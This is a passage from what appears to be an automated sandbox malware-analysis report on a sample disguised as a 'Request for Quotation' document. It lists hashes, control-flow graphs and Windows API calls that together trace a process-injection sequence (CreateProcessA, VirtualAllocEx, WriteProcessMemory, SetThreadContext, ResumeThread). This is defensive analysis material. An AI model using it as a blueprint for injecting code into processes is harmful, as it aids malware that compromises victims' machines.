                                                                                                                        • Opcode Fuzzy Hash: ea10155737baf14d7db4284597a40315176c9bbc1ccdabfab195cb7e63979fa5
                                                                                                                        • Instruction Fuzzy Hash: 91E179B1B016068FDB25EB75D8A0BAEB7F6AFC9600F14446ED146DB390CB35E901CB61
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 248521a72e2e6896f3f4f70eb169b2e03701883f132f21ad55c998fc09f849e2
                                                                                                                        • Instruction ID: a8c7a9e0d383c8503a4dc861b8e57dfc5ef13264a8523f603fe7faf32828d687
                                                                                                                        • Opcode Fuzzy Hash: 248521a72e2e6896f3f4f70eb169b2e03701883f132f21ad55c998fc09f849e2
                                                                                                                        • Instruction Fuzzy Hash: 64D06CF492A104DAC750EF51D4865F8F7BCEB5B300F00A497880EA3222E6349A82CF85

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0153D01E
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0153D05B
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0153D098
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0153D0F1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0
                                                                                                                        • Opcode ID: 99e412c4362a543984b0153493a33e775b0469efdbe6e347e7e47446675de0ef
                                                                                                                        • Instruction ID: 85ff7d930515357d1feb360ded08deab6a14386ad51a644a75a15c9dc9176a48
                                                                                                                        • Opcode Fuzzy Hash: 99e412c4362a543984b0153493a33e775b0469efdbe6e347e7e47446675de0ef
                                                                                                                        • Instruction Fuzzy Hash: 715187B09017498FEB14DFA9D448BDEBBF1BF88304F20845AD408BB3A0D7349944CB66

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0153D01E
                                                                                                                        • GetCurrentThread.KERNEL32 ref: 0153D05B
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 0153D098
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0153D0F1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Current$ProcessThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2063062207-0
                                                                                                                        • Opcode ID: 233849624f632f756035ff5ac96c67b93503eb07ba602a2efcf249308a8885e7
                                                                                                                        • Instruction ID: 3de4635d27e506c82d7a8902fff82d217d75e15556f41e65a84a6be8ace6e604
                                                                                                                        • Opcode Fuzzy Hash: 233849624f632f756035ff5ac96c67b93503eb07ba602a2efcf249308a8885e7
                                                                                                                        • Instruction Fuzzy Hash: AE5173B09017098FEB14DFAAD548B9EFBF1BF88310F208459E419BB390D774A944CB66

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 44 7417b1c-7417bbd 47 7417bf6-7417c16 44->47 48 7417bbf-7417bc9 44->48 55 7417c18-7417c22 47->55 56 7417c4f-7417c7e 47->56 48->47 49 7417bcb-7417bcd 48->49 50 7417bf0-7417bf3 49->50 51 7417bcf-7417bd9 49->51 50->47 53 7417bdb 51->53 54 7417bdd-7417bec 51->54 53->54 54->54 57 7417bee 54->57 55->56 58 7417c24-7417c26 55->58 64 7417c80-7417c8a 56->64 65 7417cb7-7417d71 CreateProcessA 56->65 57->50 60 7417c49-7417c4c 58->60 61 7417c28-7417c32 58->61 60->56 62 7417c34 61->62 63 7417c36-7417c45 61->63 62->63 63->63 66 7417c47 63->66 64->65 67 7417c8c-7417c8e 64->67 76 7417d73-7417d79 65->76 77 7417d7a-7417e00 65->77 66->60 69 7417cb1-7417cb4 67->69 70 7417c90-7417c9a 67->70 69->65 71 7417c9c 70->71 72 7417c9e-7417cad 70->72 71->72 72->72 74 7417caf 72->74 74->69 76->77 87 7417e10-7417e14 77->87 88 7417e02-7417e06 77->88 90 7417e24-7417e28 87->90 91 7417e16-7417e1a 87->91 88->87 89 7417e08 88->89 89->87 93 7417e38-7417e3c 90->93 94 7417e2a-7417e2e 90->94 91->90 92 7417e1c 91->92 92->90 96 7417e4e-7417e55 93->96 97 7417e3e-7417e44 93->97 94->93 95 7417e30 94->95 95->93 98 7417e57-7417e66 96->98 99 7417e6c 96->99 97->96 98->99 101 7417e6d 99->101 101->101
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07417D5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 963392458-0
                                                                                                                        • Opcode ID: ca1534945925b4207e53bb614950351ed89f15d8580aaeac271caf6b88f8b919
                                                                                                                        • Instruction ID: 43339f5e3f2a51533b432522abeb1672f15e06c301a68ee53f5c4ba946683df5
                                                                                                                        • Opcode Fuzzy Hash: ca1534945925b4207e53bb614950351ed89f15d8580aaeac271caf6b88f8b919
                                                                                                                        • Instruction Fuzzy Hash: AFA15EB1D0031ACFEB25DF68C841BEEBBB2BF48314F14856AD859A7240DB749985CF91

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 102 7417b28-7417bbd 104 7417bf6-7417c16 102->104 105 7417bbf-7417bc9 102->105 112 7417c18-7417c22 104->112 113 7417c4f-7417c7e 104->113 105->104 106 7417bcb-7417bcd 105->106 107 7417bf0-7417bf3 106->107 108 7417bcf-7417bd9 106->108 107->104 110 7417bdb 108->110 111 7417bdd-7417bec 108->111 110->111 111->111 114 7417bee 111->114 112->113 115 7417c24-7417c26 112->115 121 7417c80-7417c8a 113->121 122 7417cb7-7417d71 CreateProcessA 113->122 114->107 117 7417c49-7417c4c 115->117 118 7417c28-7417c32 115->118 117->113 119 7417c34 118->119 120 7417c36-7417c45 118->120 119->120 120->120 123 7417c47 120->123 121->122 124 7417c8c-7417c8e 121->124 133 7417d73-7417d79 122->133 134 7417d7a-7417e00 122->134 123->117 126 7417cb1-7417cb4 124->126 127 7417c90-7417c9a 124->127 126->122 128 7417c9c 127->128 129 7417c9e-7417cad 127->129 128->129 129->129 131 7417caf 129->131 131->126 133->134 144 7417e10-7417e14 134->144 145 7417e02-7417e06 134->145 147 7417e24-7417e28 144->147 148 7417e16-7417e1a 144->148 145->144 146 7417e08 145->146 146->144 150 7417e38-7417e3c 147->150 151 7417e2a-7417e2e 147->151 148->147 149 7417e1c 148->149 149->147 153 7417e4e-7417e55 150->153 154 7417e3e-7417e44 150->154 151->150 152 7417e30 151->152 152->150 155 7417e57-7417e66 153->155 156 7417e6c 153->156 154->153 155->156 158 7417e6d 156->158 158->158
                                                                                                                        APIs
                                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07417D5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 963392458-0
                                                                                                                        • Opcode ID: cbd5df7787a875d474e08c29746a655d6f9c9d6b773b32651572c065af40a481
                                                                                                                        • Instruction ID: 1513c8e6eb630670085f5ad179383f518ce9832bfcfe0762333a59d8c6ff9f4d
                                                                                                                        • Opcode Fuzzy Hash: cbd5df7787a875d474e08c29746a655d6f9c9d6b773b32651572c065af40a481
                                                                                                                        • Instruction Fuzzy Hash: 06915EB1D0031ACFEB25DF68C841BEEBBB2BF48314F14856AD859A7240DB749985CF91

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 159 153ad08-153ad17 160 153ad43-153ad47 159->160 161 153ad19-153ad26 call 153a02c 159->161 163 153ad5b-153ad9c 160->163 164 153ad49-153ad53 160->164 167 153ad28 161->167 168 153ad3c 161->168 170 153ada9-153adb7 163->170 171 153ad9e-153ada6 163->171 164->163 216 153ad2e call 153af90 167->216 217 153ad2e call 153afa0 167->217 168->160 172 153addb-153addd 170->172 173 153adb9-153adbe 170->173 171->170 178 153ade0-153ade7 172->178 175 153adc0-153adc7 call 153a038 173->175 176 153adc9 173->176 174 153ad34-153ad36 174->168 177 153ae78-153af38 174->177 180 153adcb-153add9 175->180 176->180 209 153af40-153af6b GetModuleHandleW 177->209 210 153af3a-153af3d 177->210 181 153adf4-153adfb 178->181 182 153ade9-153adf1 178->182 180->178 185 153ae08-153ae11 call 153a048 181->185 186 153adfd-153ae05 181->186 182->181 190 153ae13-153ae1b 185->190 191 153ae1e-153ae23 185->191 186->185 190->191 192 153ae41-153ae45 191->192 193 153ae25-153ae2c 191->193 214 153ae48 call 153b270 192->214 215 153ae48 call 153b2a0 192->215 193->192 195 153ae2e-153ae3e call 153a058 call 153a068 193->195 195->192 198 153ae4b-153ae4e 200 153ae71-153ae77 198->200 201 153ae50-153ae6e 198->201 201->200 211 153af74-153af88 209->211 212 153af6d-153af73 209->212 210->209 212->211 214->198 215->198 216->174 217->174
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0153AF5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4139908857-0
                                                                                                                        • Opcode ID: 0b8bc0576ac8674ef8eb554350f868c0ce0615982a841b1ca512a75c3478a769
                                                                                                                        • Instruction ID: 64c8e61ac69aa74fd857f6df8bf30bc128b17c7170ec04ff78fbadeea5ce885e
                                                                                                                        • Opcode Fuzzy Hash: 0b8bc0576ac8674ef8eb554350f868c0ce0615982a841b1ca512a75c3478a769
                                                                                                                        • Instruction Fuzzy Hash: C1812570A00B058FE725DF2AD45475ABBF1FF88204F108A2DD49ADBA50D779E949CB90

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 218 15358ec-15359b9 CreateActCtxA 220 15359c2-1535a1c 218->220 221 15359bb-15359c1 218->221 228 1535a2b-1535a2f 220->228 229 1535a1e-1535a21 220->229 221->220 230 1535a31-1535a3d 228->230 231 1535a40 228->231 229->228 230->231 233 1535a41 231->233 233->233
                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 015359A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: d4626969f961e7a3291e7e9b4894a91fd6eeff200ba710740b22485e4d0f44f3
                                                                                                                        • Instruction ID: 1ce8416e22e8aff8a16d4f85938a70ba70d0da361583abe413a14c9ad44df92e
                                                                                                                        • Opcode Fuzzy Hash: d4626969f961e7a3291e7e9b4894a91fd6eeff200ba710740b22485e4d0f44f3
                                                                                                                        • Instruction Fuzzy Hash: EE41CFB1C10719CFEB24CFA9C884BDEBBB1BF89304F20816AD409AB255DB756946CF50

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 234 15344b4-15359b9 CreateActCtxA 237 15359c2-1535a1c 234->237 238 15359bb-15359c1 234->238 245 1535a2b-1535a2f 237->245 246 1535a1e-1535a21 237->246 238->237 247 1535a31-1535a3d 245->247 248 1535a40 245->248 246->245 247->248 250 1535a41 248->250 250->250
                                                                                                                        APIs
                                                                                                                        • CreateActCtxA.KERNEL32(?), ref: 015359A9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Create
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2289755597-0
                                                                                                                        • Opcode ID: 6bcbaa00b424af66291102169668acae80ba15f356c34fdf5f3eb951edc4f924
                                                                                                                        • Instruction ID: 7e6c95e4afcd6f9891b5e37511b2f8f9ef6f53ae37125c963ad061334a05c127
                                                                                                                        • Opcode Fuzzy Hash: 6bcbaa00b424af66291102169668acae80ba15f356c34fdf5f3eb951edc4f924
                                                                                                                        • Instruction Fuzzy Hash: 3F41BDB0C1071D8FEB24DFA9C844B9EBBB5BB89304F20806AD409AB251DB756946CF90

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 251 7417898-74178ee 254 74178f0-74178fc 251->254 255 74178fe-741793d WriteProcessMemory 251->255 254->255 257 7417946-7417976 255->257 258 741793f-7417945 255->258 258->257
                                                                                                                        APIs
                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07417930
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3559483778-0
                                                                                                                        • Opcode ID: d7bd04a9265a42bd957bf237f0705e20d480a201664507d257816873f08013c9
                                                                                                                        • Instruction ID: 415527298a0be969d1d1e0f619b8e2a9cf0af08003a20097e83db6e68197156d
                                                                                                                        • Opcode Fuzzy Hash: d7bd04a9265a42bd957bf237f0705e20d480a201664507d257816873f08013c9
                                                                                                                        • Instruction Fuzzy Hash: D12168B2900349DFDB10DFA9C881BDEBBF5FF48310F10842AE959A7240C7789945CBA0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 272 7417988-7417a1d ReadProcessMemory 276 7417a26-7417a56 272->276 277 7417a1f-7417a25 272->277 277->276
                                                                                                                        APIs
                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07417A10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1726664587-0
                                                                                                                        • Opcode ID: 54ef184db87cf7a79abeaaf911c3a0727516f69eb9b52fdea867726241db3940
                                                                                                                        • Instruction ID: 6d37f932b6b1ad2fbb6ab711e53c0ffc2a0551329a9e898e5a620c14061fb805
                                                                                                                        • Opcode Fuzzy Hash: 54ef184db87cf7a79abeaaf911c3a0727516f69eb9b52fdea867726241db3940
                                                                                                                        • Instruction Fuzzy Hash: 2A2136B29003499FDB10DFAAC881BEEFBF5FF48310F54842AE958A7240D7799541CBA4

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 262 74178a0-74178ee 264 74178f0-74178fc 262->264 265 74178fe-741793d WriteProcessMemory 262->265 264->265 267 7417946-7417976 265->267 268 741793f-7417945 265->268 268->267
                                                                                                                        APIs
                                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07417930
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3559483778-0
                                                                                                                        • Opcode ID: adfa4597349e7cd4473cef868d9fb81a1c910f4b3c5ba79d276b265060f86632
                                                                                                                        • Instruction ID: 23ebf48db9cde09554b371be22c6a7ee89973586c9442baf93ddf19f33156dd6
                                                                                                                        • Opcode Fuzzy Hash: adfa4597349e7cd4473cef868d9fb81a1c910f4b3c5ba79d276b265060f86632
                                                                                                                        • Instruction Fuzzy Hash: 0D2127B2900349DFDB10DFA9C885BDEBBF5FF48310F54842AE959A7240C7789954CBA0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 281 74172c8-741731b 284 741732b-741735b Wow64SetThreadContext 281->284 285 741731d-7417329 281->285 287 7417364-7417394 284->287 288 741735d-7417363 284->288 285->284 288->287
                                                                                                                        APIs
                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0741734E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 983334009-0
                                                                                                                        • Opcode ID: 2e8dbcc289269853a85ab766b9ca2e0cd0acbbe273637ab646f2198277132765
                                                                                                                        • Instruction ID: 0d655d9764877d5a4e71e35ad3ba3a9fac3cb5b45fcaa19f42d9442abaee8608
                                                                                                                        • Opcode Fuzzy Hash: 2e8dbcc289269853a85ab766b9ca2e0cd0acbbe273637ab646f2198277132765
                                                                                                                        • Instruction Fuzzy Hash: 432159B29003098FDB10DFAAC4857EEBBF4EF48210F54842AD959A7340D7789645CFA1

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 292 153d5e8-153d5ee 293 153d5f0-153d684 DuplicateHandle 292->293 294 153d686-153d68c 293->294 295 153d68d-153d6aa 293->295 294->295
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153D677
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 3b810cf843830141393cf51fc51d81cd700855cfbdc84f12c393e779f60823fa
                                                                                                                        • Instruction ID: b1d10ee4f4e284bf3f6def5f1f77549e50271635fe7567f86533c19832a3c928
                                                                                                                        • Opcode Fuzzy Hash: 3b810cf843830141393cf51fc51d81cd700855cfbdc84f12c393e779f60823fa
                                                                                                                        • Instruction Fuzzy Hash: DD21E9B5D00249DFDB10CF9AD485ADEBBF5FB48310F14842AE918A7350D374A950CFA5

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 298 74172d0-741731b 300 741732b-741735b Wow64SetThreadContext 298->300 301 741731d-7417329 298->301 303 7417364-7417394 300->303 304 741735d-7417363 300->304 301->300 304->303
                                                                                                                        APIs
                                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0741734E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContextThreadWow64
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 983334009-0
                                                                                                                        • Opcode ID: 98ec58c79823986c7ac027528010bac5e4707727506818840983fe754bc9bf63
                                                                                                                        • Instruction ID: a47e15679ad7ec0c984dfe6f320f59927b5e0217712c2633bc52d08188df14ff
                                                                                                                        • Opcode Fuzzy Hash: 98ec58c79823986c7ac027528010bac5e4707727506818840983fe754bc9bf63
                                                                                                                        • Instruction Fuzzy Hash: 132147B2D003098FDB10DFAAC4857EEBBF4EF48210F54842AD959A7340DB789A45CFA0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 308 7417990-7417a1d ReadProcessMemory 311 7417a26-7417a56 308->311 312 7417a1f-7417a25 308->312 312->311
                                                                                                                        APIs
                                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07417A10
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MemoryProcessRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1726664587-0
                                                                                                                        • Opcode ID: f3fc9af4ef1931ee1351ed6b83d55d4f198f515ee1fc4bfa1bf1d9b2c65780ca
                                                                                                                        • Instruction ID: 71583eb6604927a9c787c6232212298fcb79a231ce66df3148f2f28fbc4abbfd
                                                                                                                        • Opcode Fuzzy Hash: f3fc9af4ef1931ee1351ed6b83d55d4f198f515ee1fc4bfa1bf1d9b2c65780ca
                                                                                                                        • Instruction Fuzzy Hash: DD2128B29003499FDB10DFAAC881BEEBBF5FF48310F54842AE558A7240D7799540CBA0

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 316 153d5f0-153d684 DuplicateHandle 317 153d686-153d68c 316->317 318 153d68d-153d6aa 316->318 317->318
                                                                                                                        APIs
                                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153D677
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1413449218.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_1530000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DuplicateHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3793708945-0
                                                                                                                        • Opcode ID: 6699a65ac61d1e9a7ce542cb53946fa10b4504b87ffbd55236976199996f0d82
                                                                                                                        • Instruction ID: 1c794d9c986db5ba5730c8d86d950df5a32cb721a53a401e4b75269a2a23bbf0
                                                                                                                        • Opcode Fuzzy Hash: 6699a65ac61d1e9a7ce542cb53946fa10b4504b87ffbd55236976199996f0d82
                                                                                                                        • Instruction Fuzzy Hash: 8E21D5B5900249DFDB10CF9AD584ADEFBF5FB48310F14841AE918A7350D374A954CF65
                                                                                                                        APIs
                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0741784E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 86dc73b6f2d7f5c60827de722222b6a204ec61b2842adc52a431b540fe8db150
                                                                                                                        • Instruction ID: 58e5bc5d9a46fbb62af9c52558f65539293c52f11eb363a7fac77aeb9e80de4f
                                                                                                                        • Opcode Fuzzy Hash: 86dc73b6f2d7f5c60827de722222b6a204ec61b2842adc52a431b540fe8db150
                                                                                                                        • Instruction Fuzzy Hash: F5216472800349DFDB10DFAAC844BEEBBF5EF48310F24882AE559A7250C7799945CBA0
                                                                                                                        APIs
                                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0741784E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: cf8ebfae3479dd44816556a6ecf8a2f3953c33df005bc8c1e08ea3674265d78d
                                                                                                                        • Instruction ID: ef7276e0bae82ae984296c9c648ee0bf215f841246b8bdc7c8fa69eb9cfd4b1c
                                                                                                                        • Opcode Fuzzy Hash: cf8ebfae3479dd44816556a6ecf8a2f3953c33df005bc8c1e08ea3674265d78d
                                                                                                                        • Instruction Fuzzy Hash: DA1137729003499FDB10DFAAC845BDFBBF5EF48310F14882AE519A7250C7759550CFA0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        • Opcode ID: 07db19b83e7dc0e877c2b9db277756cc12f08dd858078d1c6a7b2bc7af37a1ba
                                                                                                                        • Instruction ID: c5ccdf056554682db6044006e53dad76abb3ac0b19b663bbd8663c0baf412546
                                                                                                                        • Opcode Fuzzy Hash: 07db19b83e7dc0e877c2b9db277756cc12f08dd858078d1c6a7b2bc7af37a1ba
                                                                                                                        • Instruction Fuzzy Hash: 901158B29003498FDB10DFAAC4457EFFBF5EF49220F24842AD559A7240CB79A941CFA5
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1419362203.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7410000_Request for Quotation MK FMHS.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ResumeThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 947044025-0
                                                                                                                        • Opcode ID: fba33f1ef292c5fbd5f9009b887b3982804e126dc896109c89efa4677b0aad2d
                                                                                                                        • Instruction ID: b41c096e4545c2b23731fa905fb6c69e39f31521027fe41467074aa8f5bba75b
                                                                                                                        • Opcode Fuzzy Hash: fba33f1ef292c5fbd5f9009b887b3982804e126dc896109c89efa4677b0aad2d
                                                                                                                        • Instruction Fuzzy Hash: BE113AB19003498FDB10DFAAC4457DFFBF5EF48210F24842AD519A7240CB79A944CBA5
                                                                                                                        APIs
                                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0741C175
                                                                                                                        Memory Dump Source
